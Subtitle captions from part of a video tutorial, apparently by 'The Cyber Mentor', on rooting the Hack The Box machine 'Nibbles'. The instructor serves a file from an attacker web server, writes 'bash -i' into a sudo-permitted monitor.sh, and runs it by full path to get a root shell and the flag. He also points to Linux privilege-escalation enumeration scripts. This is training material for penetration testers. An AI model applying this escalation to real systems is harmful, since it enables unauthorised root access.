365 00:26:00,990 --> 00:26:02,530 .sh should be fine. 366 00:26:02,570 --> 00:26:12,120 Now we can start up python -m SimpleHTTPServer on port 80 and I'm not going to actually grab 367 00:26:12,120 --> 00:26:15,020 this file but you guys should have seen this before right. 368 00:26:15,020 --> 00:26:17,410 Well we would just do a wget here or curl. 369 00:26:17,430 --> 00:26:29,010 If we need to wget on http:// whatever your IP address is here /monitor.sh and I would get that 370 00:26:29,010 --> 00:26:34,580 file as well so we could use the echo command here and make it straightforward. 371 00:26:34,770 --> 00:26:38,280 So how do we exploit this now and what are we doing. 372 00:26:38,280 --> 00:26:44,430 Why did I just do this bash -i well bash -i just means bash interactive what we're about to 373 00:26:44,430 --> 00:26:52,620 do with a sudo command is we can run this file as sudo and make it execute right and when we execute 374 00:26:52,740 --> 00:26:56,150 it's going to echo out or it's gonna run this script which is just bash 375 00:26:56,150 --> 00:27:01,350 -i it's going to give me an interactive bash shell that interactive bash shell is going to be run 376 00:27:01,380 --> 00:27:05,430 as root because we're executing it with sudo as root. 377 00:27:05,430 --> 00:27:11,550 Now one thing that we should do here is we should make this file executable if we do ls -la you 378 00:27:11,550 --> 00:27:14,330 can see the permissions here say that we are not executable. 379 00:27:14,340 --> 00:27:16,570 We only have read write access right now. 380 00:27:16,710 --> 00:27:24,780 So let's change this to executable as well and you should always do this on your shell scripts and we'll 381 00:27:24,780 --> 00:27:31,800 say ls -la one more time and you can see now the Xs have been added. 382 00:27:31,830 --> 00:27:37,080 OK so with this let's go ahead and sudo this script here. 
383 00:27:37,110 --> 00:27:45,380 Let's just say sudo monitor.sh run that it might take a second. 384 00:27:45,750 --> 00:27:47,010 We could say whoami. 385 00:27:47,040 --> 00:27:49,080 Let's see if this actually works. 386 00:27:49,080 --> 00:27:52,050 So again we're timed out here. 387 00:27:52,200 --> 00:27:55,860 You could see that it timed out earlier on a command as well. 388 00:27:55,860 --> 00:27:59,240 So this machine has a little bit of timeout issues. 389 00:27:59,370 --> 00:28:02,730 So just give it a quick second here to load. 390 00:28:02,730 --> 00:28:03,760 And there you go. 391 00:28:04,470 --> 00:28:06,480 And again it says we're nibbler. 392 00:28:06,480 --> 00:28:10,190 Let's try it one more time and say whoami. 393 00:28:10,440 --> 00:28:11,840 And we are still nibbler. 394 00:28:11,850 --> 00:28:13,020 What's our id. 395 00:28:13,100 --> 00:28:14,100 We are still nibbler. 396 00:28:14,100 --> 00:28:16,430 Why are we still nibbler. 397 00:28:16,430 --> 00:28:18,440 Let's take a look again. 398 00:28:18,770 --> 00:28:21,740 So if we cat monitor.sh 399 00:28:28,420 --> 00:28:30,750 bash -i. 400 00:28:30,910 --> 00:28:42,600 Let's try running this as sudo /home/nibbler/personal/stuff/monitor.sh 401 00:28:47,980 --> 00:28:48,970 and then we'll do 402 00:28:48,970 --> 00:28:54,030 id at the end of this and let's give this a go see if this works 403 00:29:01,480 --> 00:29:05,610 and again if you want these scripts all you got to do out there is go out there and Google these. 404 00:29:05,610 --> 00:29:06,760 These are great. 405 00:29:06,820 --> 00:29:11,140 You should find these here pretty easily. 406 00:29:11,590 --> 00:29:18,660 Let's go to Google and I see we've got our shell back LinEnum.sh download. 407 00:29:18,700 --> 00:29:20,080 You see that. 408 00:29:20,080 --> 00:29:23,470 So rebootuser on this one and then linuxprivchecker. 
409 00:29:23,470 --> 00:29:26,350 There's actually a Linux privilege escalation. 410 00:29:26,350 --> 00:29:27,460 Oh here we go. 411 00:29:27,460 --> 00:29:30,130 Linux privilege escalation scripts down here netsec. 412 00:29:30,220 --> 00:29:31,450 Pretty good as well. 413 00:29:31,770 --> 00:29:36,950 I'll let a new line checker this g0tmi1k blog is actually really good too. 414 00:29:37,030 --> 00:29:42,440 So if you check out the g0tmi1k blog you can see all the different commands that we're not going to cover 415 00:29:42,440 --> 00:29:47,080 today but he did a great job putting this blog together on what you should be looking for. 416 00:29:47,290 --> 00:29:53,140 And then people went out and automated tools that will help do that same stuff for you. 417 00:29:53,140 --> 00:29:54,960 All that searching for you all the hard work. 418 00:29:55,690 --> 00:30:02,710 So we had you run this and we we tried to sudo this monitor we had to run the full directory with 419 00:30:02,710 --> 00:30:09,520 monitor in there and that will actually allow us to resolve to the id of root so doing this sudo 420 00:30:09,520 --> 00:30:13,540 here does not work doing it this way will work. 421 00:30:13,540 --> 00:30:19,570 So now you can see we are root we can go ahead and take advantage of that by going to the root folder 422 00:30:21,580 --> 00:30:22,720 pwd. 423 00:30:23,590 --> 00:30:24,060 OK. 424 00:30:24,100 --> 00:30:27,580 So we are root at nibbles right. 425 00:30:27,640 --> 00:30:30,260 So easy easy. 426 00:30:30,280 --> 00:30:30,570 We can. 427 00:30:30,580 --> 00:30:31,820 ls. 428 00:30:32,200 --> 00:30:33,750 And there's the root.txt. 429 00:30:33,910 --> 00:30:34,770 I keep wanting to do. 430 00:30:34,770 --> 00:30:41,890 I've been working in Windows so much lately you can't keep saying type cat root.txt and you can get 431 00:30:41,890 --> 00:30:44,500 your root flag as well and go submit those. 
432 00:30:44,530 --> 00:30:50,040 So that is it for this lesson from here. 433 00:30:50,050 --> 00:30:55,720 There is a box that I want you guys to do that box is called Optimum look for the box Optimum. 434 00:30:56,050 --> 00:31:02,620 And go ahead and give that a go in the next video we'll cover that as a precursor and then we'll go 435 00:31:02,620 --> 00:31:07,640 into another lesson but give Optimum a go and see if you can do it on your own. 436 00:31:07,690 --> 00:31:11,650 Give yourself a little confidence and see if you can't root that on your own. 437 00:31:11,800 --> 00:31:13,870 And we'll go from there. 438 00:31:14,110 --> 00:31:14,800 Other than that. 439 00:31:14,800 --> 00:31:16,360 Thank you so much for joining me. 440 00:31:16,360 --> 00:31:17,730 And until next time. 441 00:31:17,740 --> 00:31:20,530 My name is The Cyber Mentor and I will catch you later.